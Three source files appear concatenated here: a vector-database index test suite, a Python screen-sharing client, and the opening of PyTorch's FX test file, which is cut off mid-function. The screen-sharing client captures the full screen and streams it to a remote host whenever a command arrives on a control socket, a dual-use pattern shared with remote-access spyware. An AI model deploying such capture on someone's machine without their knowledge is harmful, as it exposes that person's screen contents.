status, ids = connect.add_vectors(ham_collection, self.vectors)
status = connect.create_index(ham_collection, index_type, index_param)
if index_type != IndexType.FLAT and index_type != IndexType.IVFLAT:
assert not status.OK()
else:
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, ham_collection, get_hamming_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
status = connect.create_partition(ham_collection, tag)
status, ids = connect.add_vectors(ham_collection, self.vectors, partition_tag=tag)
status = connect.create_index(ham_collection, index_type, index_param)
assert status.OK()
status, res = connect.count_collection(ham_collection)
assert res == len(self.vectors)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_structure(self, connect, substructure_collection, get_substructure_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
        expected: status is OK and the collection row count matches the number of inserted vectors
'''
index_param = get_substructure_index["index_param"]
index_type = get_substructure_index["index_type"]
logging.getLogger().info(get_substructure_index)
status = connect.create_partition(substructure_collection, tag)
status, ids = connect.add_vectors(substructure_collection, self.vectors, partition_tag=tag)
status = connect.create_index(substructure_collection, index_type, index_param)
assert status.OK()
        status, res = connect.count_collection(substructure_collection)
assert res == len(self.vectors)
# @pytest.mark.level(2)
# def test_create_index_without_connect(self, dis_connect, ham_collection):
# '''
# target: test create index without connection
# method: create collection and add vectors in it, check if added successfully
# expected: raise exception
# '''
# nlist = NLIST
# index_param = {"nlist": nlist}
# with pytest.raises(Exception) as e:
# status = dis_connect.create_index(ham_collection, IndexType.IVF_SQ8, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, ham_collection, get_hamming_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
        expected: status is OK and search returns one result set per query vector
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
status, ids = connect.add_vectors(ham_collection, self.vectors)
status = connect.create_index(ham_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(ham_collection))
query_vecs = [self.vectors[0], self.vectors[1], self.vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(ham_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors_superstructure(self, connect, superstructure_collection, get_superstructure_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
        expected: status is OK and search returns one result set per query vector
'''
index_param = get_superstructure_index["index_param"]
index_type = get_superstructure_index["index_type"]
logging.getLogger().info(get_superstructure_index)
status, ids = connect.add_vectors(superstructure_collection, self.vectors)
status = connect.create_index(superstructure_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(superstructure_collection))
query_vecs = [self.vectors[0], self.vectors[1], self.vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(superstructure_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, ham_collection, get_hamming_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
        expected: status is OK and the returned index info matches the created index
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
# status, ids = connect.add_vectors(jac_collection, vectors[:5000])
status = connect.create_index(ham_collection, index_type, index_param)
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._collection_name == ham_collection
assert result._index_type == index_type
assert result._params == index_param
def test_describe_index_partition(self, connect, ham_collection, get_hamming_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
        expected: status is OK and the returned index info matches the created index
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
logging.getLogger().info(get_hamming_index)
status = connect.create_partition(ham_collection, tag)
status, ids = connect.add_vectors(ham_collection, vectors, partition_tag=tag)
status = connect.create_index(ham_collection, index_type, index_param)
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == ham_collection
assert result._index_type == index_type
def test_describe_index_partition_superstructrue(self, connect, superstructure_collection, get_superstructure_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
        expected: status is OK and the returned index info matches the created index
'''
index_param = get_superstructure_index["index_param"]
index_type = get_superstructure_index["index_type"]
logging.getLogger().info(get_superstructure_index)
status = connect.create_partition(superstructure_collection, tag)
status, ids = connect.add_vectors(superstructure_collection, vectors, partition_tag=tag)
status = connect.create_index(superstructure_collection, index_type, index_param)
status, result = connect.describe_index(superstructure_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == superstructure_collection
assert result._index_type == index_type
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, ham_collection, get_hamming_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
        expected: status is OK and the index reverts to the default (FLAT)
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ham_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
status = connect.drop_index(ham_collection)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._collection_name == ham_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_substructure(self, connect, substructure_collection, get_substructure_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
        expected: status is OK and the index reverts to the default (FLAT)
'''
index_param = get_substructure_index["index_param"]
index_type = get_substructure_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
status = connect.create_index(substructure_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(substructure_collection)
logging.getLogger().info(result)
status = connect.drop_index(substructure_collection)
assert status.OK()
status, result = connect.describe_index(substructure_collection)
logging.getLogger().info(result)
assert result._collection_name == substructure_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_partition(self, connect, ham_collection, get_hamming_index):
'''
target: test drop index interface
method: create collection, create partition and add vectors in it, create index on collection, call drop collection index
        expected: status is OK and the index reverts to the default (FLAT)
'''
index_param = get_hamming_index["index_param"]
index_type = get_hamming_index["index_type"]
status = connect.create_partition(ham_collection, tag)
status, ids = connect.add_vectors(ham_collection, vectors, partition_tag=tag)
status = connect.create_index(ham_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
status = connect.drop_index(ham_collection)
assert status.OK()
status, result = connect.describe_index(ham_collection)
logging.getLogger().info(result)
assert result._collection_name == ham_collection
assert result._index_type == IndexType.FLAT
class TestIndexCollectionInvalid(object):
"""
Test create / describe / drop index interfaces with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(1)
def test_create_index_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
nlist = NLIST
index_param = {"nlist": nlist}
status = connect.create_index(collection_name, IndexType.IVF_SQ8, index_param)
assert not status.OK()
@pytest.mark.level(1)
def test_describe_index_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
status, result = connect.describe_index(collection_name)
assert not status.OK()
@pytest.mark.level(1)
def test_drop_index_with_invalid_collectionname(self, connect, get_collection_name):
collection_name = get_collection_name
status = connect.drop_index(collection_name)
assert not status.OK()
class TestCreateIndexParamsInvalid(object):
"""
Test Building index with invalid collection names, collection names not in db
"""
@pytest.fixture(
scope="function",
params=gen_invalid_index()
)
def get_index(self, request):
yield request.param
@pytest.mark.level(1)
def test_create_index_with_invalid_index_params(self, connect, collection, get_index):
index_param = get_index["index_param"]
index_type = get_index["index_type"]
logging.getLogger().info(get_index)
# status, ids = connect.add_vectors(collection, vectors)
if (not index_type) or (not isinstance(index_type, IndexType)):
with pytest.raises(Exception) as e:
status = connect.create_index(collection, index_type, index_param)
else:
status = connect.create_index(collection, index_type, index_param)
assert not status.OK()
"""
Test Building index with invalid nlist
"""
@pytest.fixture(
scope="function",
        params=[IndexType.FLAT, IndexType.IVFLAT, IndexType.IVF_SQ8, IndexType.IVF_SQ8H]
)
def get_index_type(self, request):
yield request.param
def test_create_index_with_invalid_nlist(self, connect, collection, get_index_type):
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, get_index_type, {"nlist": INVALID_NLIST})
if get_index_type != IndexType.FLAT:
assert not status.OK()
    """
    Test Building index with empty params
    """
def test_create_index_with_empty_param(self, connect, collection, get_index_type):
logging.getLogger().info(get_index_type)
status = connect.create_index(collection, get_index_type, {})
        if get_index_type != IndexType.FLAT:
assert not status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
class TestIndexAsync:
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
# if request.param["index_type"] == IndexType.IVF_PQ:
if request.param["index_type"] not in [IndexType.IVF_FLAT]:
# pytest.skip("ivfpq not support in GPU mode")
pytest.skip("debug ivf_flat in GPU mode")
return request.param
def check_status(self, status):
logging.getLogger().info("In callback check status")
assert status.OK()
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
        expected: the returned future resolves to an OK status
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
vectors = gen_vectors(nb, dim)
status, ids = connect.add_vectors(collection, vectors)
logging.getLogger().info("start index")
# future = connect.create_index(collection, index_type, index_param, _async=True, _callback=self.check_status)
future = connect.create_index(collection, index_type, index_param, _async=True)
logging.getLogger().info("before result")
status = future.result()
assert status.OK()
def test_create_index_with_invalid_collectionname(self, connect):
collection_name = " "
nlist = NLIST
index_param = {"nlist": nlist}
future = connect.create_index(collection_name, IndexType.IVF_SQ8, index_param, _async=True)
status = future.result()
assert not status.OK()
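# Editorial sketch, not part of the original test suite: the asynchronous pattern
# exercised by TestIndexAsync can be folded into a small helper. It assumes only what
# the tests above already rely on: create_index(..., _async=True) returns a future
# whose result() is a Status object exposing OK().
def build_index_and_wait(connect, collection_name, index_type, index_param):
    """Start an index build asynchronously and block until the server reports back."""
    future = connect.create_index(collection_name, index_type, index_param, _async=True)
    status = future.result()  # blocks until the build request has been processed
    return status.OK()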
|
streamingClient.py
|
import threading
import cv2
import pickle
import struct
import numpy as np
import socket
from PIL import ImageGrab
class StreamingClient:
"""
Abstract class for the generic streaming client.
Attributes
----------
Private:
__host : str
host address to connect to
__port : int
port to connect to
__running : bool
            indicates whether the client is currently streaming
__encoding_parameters : list
a list of encoding parameters for OpenCV
__client_socket : socket
the main client socket
Methods
-------
Private:
__client_streaming : main method for streaming the client data
Protected:
_configure : sets basic configurations (overridden by child classes)
_get_frame : returns the frame to be sent to the server (overridden by child classes)
_cleanup : cleans up all the resources and closes everything
Public:
start_stream : starts the client stream in a new thread
"""
def __init__(self, host, port, clientSocket):
"""
Creates a new instance of StreamingClient.
Parameters
----------
host : str
host address to connect to
port : int
port to connect to
"""
self.__host = host
self.__port = port
self._configure()
self.__running = False
#client socket to recv request
self.__client = clientSocket
# client socket to recv video
self.__client_socket = None
    def startListening(self):
        """
        Listens on the control socket for "stream"/"stop" requests from the server
        and starts or stops the video stream accordingly.
        """
        request = ""
while True:
request = self.__client.recv(1024).decode("utf-8")
if not request:
break
if request == "stream":
self.start_stream()
elif request == "stop":
self.stop_stream()
else:
return
def _configure(self):
"""
Basic configuration function.
"""
self.__encoding_parameters = [int(cv2.IMWRITE_JPEG_QUALITY), 90]
def _get_frame(self):
"""
Basic function for getting the next frame.
Returns
-------
frame : the next frame to be processed (default = None)
"""
return None
def _cleanup(self):
"""
Cleans up resources and closes everything.
"""
cv2.destroyAllWindows()
def __client_streaming(self):
"""
Main method for streaming the client data.
"""
self.__client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__client_socket.connect((self.__host, self.__port))
while self.__running:
frame = self._get_frame()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
result, frame = cv2.imencode('.jpg', frame, self.__encoding_parameters)
data = pickle.dumps(frame, 0)
size = len(data)
try:
self.__client_socket.send(struct.pack('>L', size) + data)
            except Exception:  # any failure to send ends the stream
self.__running = False
self._cleanup()
def start_stream(self):
"""
Starts client stream if it is not already running.
"""
if self.__running:
print("Client is already streaming!")
else:
self.__running = True
client_thread = threading.Thread(target=self.__client_streaming)
client_thread.start()
def stop_stream(self):
"""
        Stops the client stream if it is currently running.
"""
try:
self.__client_socket.close()
        except Exception:  # socket may be None or already closed
            pass
if self.__running:
self.__running = False
else:
print("Client not streaming!")
class ScreenShareClient(StreamingClient):
"""
Class for the screen share streaming client.
Attributes
----------
Private:
__host : str
host address to connect to
__port : int
port to connect to
__running : bool
            indicates whether the client is currently streaming
__encoding_parameters : list
a list of encoding parameters for OpenCV
__client_socket : socket
the main client socket
__x_res : int
the x resolution
__y_res : int
the y resolution
Methods
-------
Protected:
_get_frame : returns the screenshot frame to be sent to the server
Public:
start_stream : starts the screen sharing stream in a new thread
"""
def __init__(self, host, port, clientSocket, x_res=1024, y_res=576):
"""
Creates a new instance of ScreenShareClient.
Parameters
----------
host : str
host address to connect to
port : int
port to connect to
x_res : int
the x resolution
y_res : int
the y resolution
"""
self.__x_res = x_res
self.__y_res = y_res
super(ScreenShareClient, self).__init__(host, port, clientSocket)
def _get_frame(self):
"""
Gets the next screenshot.
Returns
-------
frame : the next screenshot frame to be processed
"""
screen = ImageGrab.grab() #pyautogui.screenshot()
frame = np.array(screen)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = cv2.resize(frame, (self.__x_res, self.__y_res), interpolation=cv2.INTER_AREA)
return frame
#a = ScreenShareClient("localhost", 5000, client_socket)  # also needs a connected control socket
#a.start_stream()
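# Editorial usage sketch, not part of the original module: host names and port numbers
# below are placeholders. The client needs an already connected control socket on which
# the server sends "stream"/"stop" commands; the video itself is pushed to (host, port)
# once streaming starts.
if __name__ == "__main__":
    control_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    control_socket.connect(("localhost", 9999))  # control channel (placeholder port)
    client = ScreenShareClient("localhost", 5000, control_socket)  # video goes to port 5000
    client.startListening()  # blocks, starting/stopping the stream on server request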
|
test_fx.py
|
# Owner(s): ["oncall: fx"]
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import typing
import types
import warnings
import unittest
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH, CodeGen
from torch.fx.node import Target, Argument, _format_arg
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
    from fx.test_gradual_type import AnnotationsTest  # noqa: F401
    from fx.test_gradual_type import TypeCheckerTest  # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Set, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
wrap('getattr')
def wrapped_named_tup(p1, *, p2):
return p1.x + p2.y
wrap(wrapped_named_tup)
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
def _custom_fx_repr_fn(self) -> str:
return f"Pair(x={_format_arg(self.x)}, y={_format_arg(self.y)})"
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
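# Editorial sketch, not part of the upstream test file: the wrap() calls above make
# symbolic_trace record a call_function node for the wrapped callable instead of
# tracing into its body, which is what the wrap-related tests below assert.
def _wrap_tracing_sketch():
    """Illustrates that a wrap()'d function survives tracing as a symbolic call."""
    def uses_lifted_leaf(y):
        return a_lifted_leaf((y, y), y)
    traced = symbolic_trace(uses_lifted_leaf)
    assert 'a_lifted_leaf' in traced.code  # the call is preserved, not inlined
    return traced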
class TestFX(JitTestCase):
def setUp(self):
        # Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS):
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
# test for issue described at https://github.com/pytorch/pytorch/issues/63883
class M3(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
m3 = M3()
gm3 = symbolic_trace(m3)
new_instance = gm3.__new__(type(gm3))
new_instance.__init__(gm3, gm3.graph)
x = torch.randn(5, 3)
torch.testing.assert_allclose(new_instance(x), torch.relu(x))
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_fx_and_or(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x & x, x | x
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_matmul_tracing(self):
const = torch.randn(3)
def matmul_f(x):
return x @ const
mod = symbolic_trace(matmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), matmul_f(inp))
def rmatmul_f(x):
return const @ x
mod = symbolic_trace(rmatmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), rmatmul_f(inp))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
# saving the original list because we will insert new nodes as a part of a test
orig_graph_nodes = list(graph.nodes)
for node in orig_graph_nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
# verify that copying the node does not lose the stack trace
new_node = graph.node_copy(node)
self.assertTrue(new_node.stack_trace is not None)
assert 'test_fx.py' in new_node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
